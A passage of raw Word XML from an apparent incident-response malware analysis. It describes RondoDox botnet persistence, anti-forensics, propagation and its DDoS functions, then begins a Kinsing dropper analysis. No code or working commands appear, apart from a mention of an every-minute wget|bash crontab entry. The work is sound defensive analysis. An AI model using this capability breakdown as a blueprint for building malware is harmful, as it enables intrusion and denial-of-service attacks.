        <w:t xml:space="preserve">Immutable Attribute: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Sets immutable file flag on all installed copies via FUN_00401be0, preventing deletion without root + chattr</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Anti-Forensics: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Zeros all decrypted path strings after use (_DAT_0051d9d0 = 0, _DAT_0051d9db = 0, etc.) to prevent memory forensics recovery</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Shell Propagation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Calls FUN_00401800 (popen-based shell exec) for additional propagation after installation completes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D7AB5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">File Propagation (FUN_004008C0)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Iterates over multiple system directories stored at </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">DAT_0051D176</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> through </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">DAT_0051D1B0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">For each directory, formats a path and copies the binary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Sets permissions to 0x1ED (octal 755, rwxr-xr-x)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Targets include /usr/bin, /usr/sbin, /tmp, /var/tmp, and other writable locations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D7AB5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Writable Directory Discovery (FUN_00401CA0)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Tests 13 candidate directories from a hardcoded list</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">For each: checks access (F_OK), then write permission (W_OK)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Attempts to disable file immutable attributes via ioctl (0x80086601/0x40086602)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Returns first writable path for binary installation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D7AB5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Multi-Target Persistence Writer (FUN_00402ed0)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Takes an array of file paths and writes persistence entries to each:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">For each path: opens file, removes immutable attribute, reads existing crontab/init lines</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Checks each line against security tool names (FUN_00402af0) to avoid overwriting protective entries</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Validates any ELF files found in entries (FUN_00401b10)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Appends the bot's persistence command to each file</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Re-sets immutable attribute after writing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Frees allocated memory and unlinks temporary files</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D7AB5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Forensic Observation: No RondoDox Persistence Found on Disk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="CC0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CRITICAL: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Despite the extensive persistence capabilities documented above (10+ paths, crontab injection, init.d/rc.local writing, immutable file attributes), forensic examination found </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">zero RondoDox persistence artifacts on disk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">. The rondo_persistence.txt evidence file shows all persistence checks returned empty results — no crontab entries, no init.d scripts, no rc.local modifications attributable to RondoDox.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Possible explanations:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">RondoDox was captured/dumped before it achieved full execution (interrupted during deployment)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The binary was manually placed by Kinsing but never executed with sufficient privileges</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">RondoDox persistence was installed but subsequently cleaned by the Kinsing rootkit or the security team</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The binary's anti-debug checks (TracerPid) may have detected the analysis environment and aborted persistence installation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Contrast with Kinsing: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Kinsing successfully installed root crontab persistence (every-minute wget|bash), deleted its binary from disk while continuing execution, and maintained active C2 connections — indicating full operational capability. RondoDox appears to have been a secondary payload that did not achieve full persistence.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5984"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.8 Decompiled Function Map</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Key functions identified through Ghidra decompilation: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2600"/>
        <w:gridCol w:w="466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Address</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Size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Function</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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0x004001C0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400 B</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Encryption Engine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9-layer custom encryption/obfuscation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0x00400540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629 B</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Process Scanner</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Reads /proc/[pid]/status, checks running processes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0x004007C0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248 B</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File Copy</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Copies binary to new location with open/read/write</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0x004008C0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262 B</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Multi-Dir Propagation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Copies to 6+ system directories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0x00400B40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341 B</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UDP Flood</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Raw socket UDP flooding with random ports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0x00400CA0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860 B</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HTTP Flood</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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HTTP/HTTPS request flooding with payload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0x00401000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557 B</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TCP SYN Flood</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Raw socket SYN flooding with IP spoofing</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0x00401240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492 B</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Non-Blocking Connect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Async connection with select() timeout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0x00401430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962 B</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SSH Propagation</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SSH brute-force + ELF payload delivery</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0x00401800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613 B</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Shell Exec Propagation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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popen-based command execution spreading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0x00401B10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207 B</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ELF Validator</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Validates ELF headers + PT_DYNAMIC check</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0x00401BE0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181 B</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Immutable Attr Toggle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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ioctl to remove/set immutable file flags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0x00401CA0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146 B</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Writable Dir Finder</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Discovers writable installation directories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0x00401D40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67 B</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Signal Catcher</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Catches SIGUSR1 from watchdog, self-terminates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0x00401D90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396 B</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Anti-Debug Loop</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TracerPid monitoring, kills debuggers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0x00401F20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125 B</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Watchdog Fork</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Forks anti-debug watchdog process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0x00402060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977 B</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DNS Amplification</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Crafted DNS packets for DDoS amplification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0x00402530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~800 B</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String Decryptor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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9-step runtime string decryption pipeline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0x004028E0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~400 B</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Persistence Writer</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Decrypts 4 strings, writes crontab/init entries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0x00402AF0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~300 B</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Security Tool Detector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Decrypts/checks 11 tool names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0x00402C60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~600 B</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Crontab Writer</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Reads/writes crontab entries for persistence</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0x00402ED0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~500 B</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Multi-Target Writer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Writes persistence to multiple file paths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0x00403170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~2600 B</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Competition Killer</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Decrypts ~80 names, kills matching processes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0x004049B0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~700 B</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ICMP Flood</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Raw IP-spoofed ICMP packet flood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0x00404EA0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~1700 B</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Self-Installer</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Full install: 10+ paths, cron, init, immutable</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0x00405DF0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~400 B</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Daemonization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Double-fork, setsid, signal ignore (9 signals)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0x00405F60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~600 B</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Watchdog/Respawner</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Monitors bot, respawns if killed</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0x00406140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~500 B</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SSH Credential Gen</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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PRNG-based credential generation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0x004064C0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~700 B</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UDP Flood v2</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PRNG random payload UDP flood</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0x004069D0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~1400 B</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TCP SYN Custom Opts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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SYN flood with custom TCP options/flags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0x00407360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~500 B</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DNS Amp Payload</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512-byte DNS amplification query builder</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0x00407580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~500 B</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HTTP Payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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100-byte HTTP request payload builder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0x00408100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~500 B</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NTP Amp Payload</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NTP monlist amplification query builder</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0x00408530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~500 B</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SSDP Payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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SSDP/UPnP M-SEARCH amplification builder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0x00408760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~700 B</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Large Amp Payload</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1,356-byte memcached/CLDAP amplification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0x0040B300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13,044 B</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Main C2 Handler</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Largest function — C2 command dispatch</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0x0040E620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10,377 B</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Attack Dispatcher</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Secondary command handler for DDoS ops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0x004164F8</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11 B</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rand() wrapper</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Random number generation for encryption</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A5C"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Kinsing Dropper/C2 Agent — Deep Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5984"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">4.1 Binary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Architecture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x86-64 (LE)</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Compiler</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Go (gc)</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Go Build Info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.go.buildinfo section present at 0x0094C000</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.text Section</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0x00401000 – 0x006AF79E (2,811,807 bytes executable)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.rodata Section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0x006B0000 – 0x007BDA63 (1,104,484 bytes read-only data)</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.gopclntab</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0x007BFDA0 – 0x0094B287 (1,619,176 bytes Go PC-line table)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Total Functions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3,826 (Ghidra-identified)</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Decompiled Functions</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58 (by Ghidra script, limited to named + first 200)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Defined Strings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11,130</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HTTP Library</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go-resty/2.7.0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Multiplexer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yamux (connection multiplexing)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The Go PC-line table (.gopclntab, 1.6 MB) enabled extensive symbol recovery despite the binary being stripped. The massive .rodata section (1.1 MB) contains Go string tables with embedded URLs, paths, and configuration data.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5984"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">4.2 Go Symbol Table &amp; Function Map</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Recovery of 100+ main.* function symbols reveals the complete operational architecture:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D7AB5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Core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Function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Category</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main.main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Entry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Main execution loop, initializes all subsystems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main.downloadAndExecute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Payload</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Downloads and executes remote payloads (miner, scripts)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main.DownloadFile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Payload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HTTP file download to disk</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main.DownloadFileBytes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Payload</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HTTP file download to memory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main.kiLoader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Payload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Kinsing-specific loader for self-updates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main.startCmd</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Execution</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Starts system commands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main.runcmd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Execution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Runs commands with output capture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main.syncCmd</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Execution</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Synchronous command execution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main.execTask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Tasking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Executes received C2 tasks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main.execTaskOut</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Tasking</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Executes tasks with output capture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main.doTask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Tasking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Task processing dispatcher</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main.runTask</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Tasking</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Task runner with error handling</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
